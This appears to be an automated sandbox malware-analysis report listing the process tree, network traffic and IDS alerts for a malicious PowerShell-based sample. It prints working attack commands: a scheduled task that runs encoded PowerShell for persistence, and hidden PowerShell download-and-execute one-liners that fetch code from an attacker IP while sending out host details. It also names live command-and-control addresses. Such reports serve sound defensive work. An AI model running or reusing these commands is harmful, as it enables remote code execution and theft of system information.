download: | p |
Full analysis: | https://app.any.run/tasks/776b97c3-69d0-423f-8619-bed500b441b2 |
Verdict: | Malicious activity |
Analysis date: | October 20, 2020, 09:56:20 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines |
MD5: | 47DEE8020B2CF7336173C54AB6A71033 |
SHA1: | 8C2572F97C3BB2D3D8CB2156596318AD12290831 |
SHA256: | 9558FA57CE3C589061403A2F847136ECD03E9C785C57F25188ED1FA1D256F887 |
SSDEEP: | 48:1ffilIypT0yuuQRivHi/WDV2b9rKN5Wrhe:slxpvpHiODV2b9YArhe |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2064 | "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Local\Temp\p | C:\Windows\system32\rundll32.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2512 | "C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\AppData\Local\Temp\p | C:\Windows\system32\NOTEPAD.EXE | — | rundll32.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Notepad Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3536 | "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" | C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 4294967295 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3224 | "C:\Windows\system32\getmac.exe" /FO CSV | C:\Windows\system32\getmac.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Displays NIC MAC information Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3340 | "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 45 /tn Winnet /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AYwBkAG4ALgBjAGgAYQB0AGMAZABuAC4AbgBlAHQALwBwAD8AaABpAGcAMgAwADEAMAAyADAAJwApAA==" /F | C:\Windows\system32\schtasks.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1656 | "C:\Windows\system32\schtasks.exe" /run /tn Winnet | C:\Windows\system32\schtasks.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
540 | "C:\Windows\system32\cmd.exe" /c powershell -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).downloadstring('http://188.166.162.201/update.png?&mac=12-A9-86-6C-77-DE&av=&version=6.1.7601&bit=32-bit&flag2=False&domain=WORKGROUP&user=admin&PS=True')" | C:\Windows\system32\cmd.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2496 | powershell -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).downloadstring('http://188.166.162.201/update.png?&mac=12-A9-86-6C-77-DE&av=&version=6.1.7601&bit=32-bit&flag2=False&domain=WORKGROUP&user=admin&PS=True')" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
4072 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\ux6-qudl.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
3112 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES996.tmp" "c:\Users\admin\AppData\Local\Temp\CSC995.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3536 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\64XS4DZO84M13YEYE0TN.temp | — | |
MD5:— | SHA256:— | |||
2496 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2T2UP1YI02OIOA9JQ34B.temp | — | |
MD5:— | SHA256:— | |||
4072 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSC995.tmp | — | |
MD5:— | SHA256:— | |||
4072 | csc.exe | C:\Users\admin\AppData\Local\Temp\ux6-qudl.pdb | — | |
MD5:— | SHA256:— | |||
3112 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RES996.tmp | — | |
MD5:— | SHA256:— | |||
4072 | csc.exe | C:\Users\admin\AppData\Local\Temp\ux6-qudl.dll | — | |
MD5:— | SHA256:— | |||
4072 | csc.exe | C:\Users\admin\AppData\Local\Temp\ux6-qudl.out | — | |
MD5:— | SHA256:— | |||
2496 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2df8cc.TMP | binary | |
MD5:D6EE8C34E4C28999F00E385C8808E7DE | SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB | |||
2496 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:D6EE8C34E4C28999F00E385C8808E7DE | SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB | |||
2496 | powershell.exe | C:\Users\admin\AppData\Local\Temp\ux6-qudl.cmdline | text | |
MD5:5C1F261FB7296EBE84B9B10BE57D3379 | SHA256:0D21623E5B64B29B6A22528ECEE9B44F32458B879C68DB3473FD859103BF42D3 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2496 | powershell.exe | GET | 200 | 188.166.162.201:80 | http://188.166.162.201/update.png?&mac=12-A9-86-6C-77-DE&av=&version=6.1.7601&bit=32-bit&flag2=False&domain=WORKGROUP&user=admin&PS=True | DE | text | 2.31 Mb | malicious |
2496 | powershell.exe | GET | 200 | 188.166.162.201:80 | http://p.estonine.com/getnew.php?ver=2020&mac=12-A9-86-6C-77-DE&re=0&pid=2496&av=&ver=6.1.7601&bit=32-bit | DE | text | 2 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2496 | powershell.exe | 188.166.162.6:445 | — | Digital Ocean, Inc. | DE | unknown |
2496 | powershell.exe | 188.166.162.4:445 | — | Digital Ocean, Inc. | DE | unknown |
2496 | powershell.exe | 188.166.162.9:445 | — | Digital Ocean, Inc. | DE | unknown |
2496 | powershell.exe | 188.166.162.2:445 | — | Digital Ocean, Inc. | DE | unknown |
2496 | powershell.exe | 188.166.162.7:445 | — | Digital Ocean, Inc. | DE | unknown |
2496 | powershell.exe | 188.166.162.1:445 | — | Digital Ocean, Inc. | DE | suspicious |
2496 | powershell.exe | 23.21.126.66:443 | api.ipify.org | Amazon.com, Inc. | US | suspicious |
2496 | powershell.exe | 188.166.162.3:445 | — | Digital Ocean, Inc. | DE | unknown |
2496 | powershell.exe | 188.166.162.201:80 | p.estonine.com | Digital Ocean, Inc. | DE | malicious |
2496 | powershell.exe | 188.166.162.5:445 | — | Digital Ocean, Inc. | DE | unknown |
Domain | IP | Reputation |
---|---|---|
p.estonine.com |
| malicious |
api.ipify.org |
| shared |
PID | Process | Class | Message |
---|---|---|---|
2496 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] PowerShell.Siggen.22 |
2496 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] PowerShell.MemoryStream.Stager |
2496 | powershell.exe | Misc activity | AV MALWARE Suspicious Powershell Script embedded in Inbound Image 3 |
2496 | powershell.exe | Misc activity | SUSPICIOUS [PTsecurity] ipify.org External IP Check |
2496 | powershell.exe | Misc activity | SUSPICIOUS [PTsecurity] ipify.org External IP Check |
2496 | powershell.exe | Misc activity | SUSPICIOUS [PTsecurity] ipify.org External IP Check |
2496 | powershell.exe | Misc activity | SUSPICIOUS [PTsecurity] ipify.org External IP Check |
2496 | powershell.exe | Misc activity | SUSPICIOUS [PTsecurity] ipify.org External IP Check |
2496 | powershell.exe | Misc activity | SUSPICIOUS [PTsecurity] ipify.org External IP Check |
2496 | powershell.exe | Misc activity | SUSPICIOUS [PTsecurity] ipify.org External IP Check |
Process | Message |
---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|